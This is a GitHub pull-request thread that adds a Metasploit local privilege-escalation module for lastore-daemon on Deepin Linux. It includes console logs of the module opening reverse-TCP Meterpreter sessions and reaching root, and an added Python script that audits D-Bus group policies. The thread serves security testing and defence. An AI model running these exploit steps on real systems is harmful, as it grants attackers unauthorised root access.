Add lastore-daemon D-Bus Privilege Escalation exploit #9756

Merged
merged 2 commits into rapid7:master from bcoles:lastore_daemon_dbus_priv_esc on Apr 20, 2018

Conversation

@bcoles
Contributor

bcoles commented Mar 24, 2018

Add lastore-daemon D-Bus Privilege Escalation exploit.

This module attempts to gain root privileges on Deepin Linux systems
by using lastore-daemon to install a package.

The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
user in the sudo group to install arbitrary system packages without
providing a password, resulting in code execution as root. By default,
the first user created on the system is a member of the sudo group.

This module has been tested successfully with lastore-daemon version
0.9.53-1 on Deepin Linux 15.5 (x64).

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/lastore_daemon_dbus_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
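The weakness the module relies on is a bus policy that grants an entire group send access to a privileged service, so the audit a defender wants is "which groups can drive this service, and is the service itself enforcing authentication?". The script below is an added example, not code from this pull request or from the Metasploit module: it parses a D-Bus busconfig policy file and lists group-scoped allow rules that reach a given destination. The policy XML, the service name com.example.PackageManager, the interface com.example.PackageManager.Manager and the method InstallPackage are constructed placeholders; the thread does not reproduce the real lastore-daemon configuration, so none of those names are claimed to match it.

```python
"""Audit a D-Bus busconfig policy for group-wide send rules.

Added example; not part of the Metasploit module or the Deepin project.
The service, interface and method names below are constructed placeholders.
"""
import xml.etree.ElementTree as ET

# Constructed sample policy: root may own and call the service, every member
# of the 'sudo' group may call InstallPackage, everyone else may only introspect.
SAMPLE_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
  <policy user="root">
    <allow own="com.example.PackageManager"/>
    <allow send_destination="com.example.PackageManager"/>
  </policy>
  <policy group="sudo">
    <allow send_destination="com.example.PackageManager"
           send_interface="com.example.PackageManager.Manager"
           send_member="InstallPackage"/>
  </policy>
  <policy context="default">
    <deny send_destination="com.example.PackageManager"/>
    <allow send_destination="com.example.PackageManager"
           send_interface="org.freedesktop.DBus.Introspectable"/>
  </policy>
</busconfig>
"""

# Attributes that make an <allow>/<deny> element a message-sending rule.
SEND_ATTRS = ("send_destination", "send_interface", "send_member", "send_path")


def parse_policy(xml_text):
    """Return [(principal, verdict, match)] for every send rule in the policy.

    principal is ("user"|"group"|"context"|"at_console", value); verdict is
    "allow" or "deny"; match holds the send_* attributes of the rule.
    Rules with no send_* attribute (own, receive, user/group matches) are
    outside the scope of this audit and are skipped.
    """
    root = ET.fromstring(xml_text)
    rules = []
    for policy in root.iter("policy"):
        principal = None
        for kind in ("user", "group", "context", "at_console"):
            if kind in policy.attrib:
                principal = (kind, policy.attrib[kind])
                break
        if principal is None:
            continue
        for rule in policy:
            if rule.tag not in ("allow", "deny"):
                continue
            match = {k: v for k, v in rule.attrib.items() if k in SEND_ATTRS}
            if match:
                rules.append((principal, rule.tag, match))
    return rules


def group_send_allows(rules, destination):
    """Group-scoped allow rules that can reach `destination`.

    A rule without send_destination matches any destination, so it is
    reported too: an overly broad rule is exactly what an audit must catch.
    """
    hits = []
    for principal, verdict, match in rules:
        if verdict != "allow" or principal[0] != "group":
            continue
        dest = match.get("send_destination")
        if dest is None or dest == destination:
            hits.append((principal, match))
    return hits


def audit(xml_text, destination):
    """Human-readable findings for group-wide access to `destination`.

    The bus policy itself performs no authentication beyond group membership;
    whether a call is safe depends on the service applying polkit or another
    check before acting, which must be verified separately.
    """
    findings = []
    for (_, group), match in group_send_allows(parse_policy(xml_text), destination):
        iface = match.get("send_interface", "<any interface>")
        member = match.get("send_member", "<any member>")
        findings.append(
            f"group '{group}' may call {iface}.{member} on {destination} with "
            "no bus-level authentication; confirm the service enforces its own check"
        )
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_POLICY, "com.example.PackageManager"):
        print(line)
```

Pointing `audit` at a real file (the contents of a policy under /etc/dbus-1/system.d/ or /usr/share/dbus-1/system.d/) gives the same report for a live system; any group-scoped hit against a service that installs software or otherwise acts as root should be checked against that service's own authorisation logic, because, as the module description above shows, membership in a default group is enough to satisfy the bus.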
@bwatters-r7 bwatters-r7 self-assigned this Apr 20, 2018
@bwatters-r7 bwatters-r7 merged commit d5961f2 into rapid7:master Apr 20, 2018
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully ran sanity checks.
Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr: The Travis CI build passed
bwatters-r7 added a commit that referenced this pull request Apr 20, 2018
Merge branch 'land-9756' into upstream-master
@bwatters-r7
Contributor

bwatters-r7 commented Apr 20, 2018

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Sending stage (812100 bytes) to 192.168.135.158
[*] Meterpreter session 3 opened (192.168.135.111:4567 -> 192.168.135.158:41644) at 2018-04-20 15:33:09 -0500

meterpreter > sysinfo
Computer     : 192.168.135.158
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(multi/handler) > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.111:4444 
[*] Building package...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/control' (110 bytes) ...
[*] Writing '/tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.VqngDqJ8fr' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 192.168.135.158
[*] Meterpreter session 4 opened (192.168.135.111:4444 -> 192.168.135.158:37688) at 2018-04-20 15:34:22 -0500
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/control
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN/postinst
[+] Deleted /tmp/.VqngDqJ8fr
[+] Deleted /tmp/.JtsRLYgyJ7fAQR/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
@bwatters-r7
Contributor

bwatters-r7 commented Apr 20, 2018

Release Notes

The exploits/linux/local/lastore_daemon_dbus_priv_esc module has been added to the framework. It abuses unauthenticated package installation through lastore-daemon D-Bus version 0.9.53-1 to gain root privileges on Deepin Linux 15.5 systems.

@bcoles
Contributor Author

bcoles commented Apr 20, 2018

Thanks

@bcoles bcoles deleted the bcoles:lastore_daemon_dbus_priv_esc branch Apr 20, 2018
msjenkins-r7 added a commit that referenced this pull request Apr 23, 2018
Merge branch 'land-9756' into upstream-master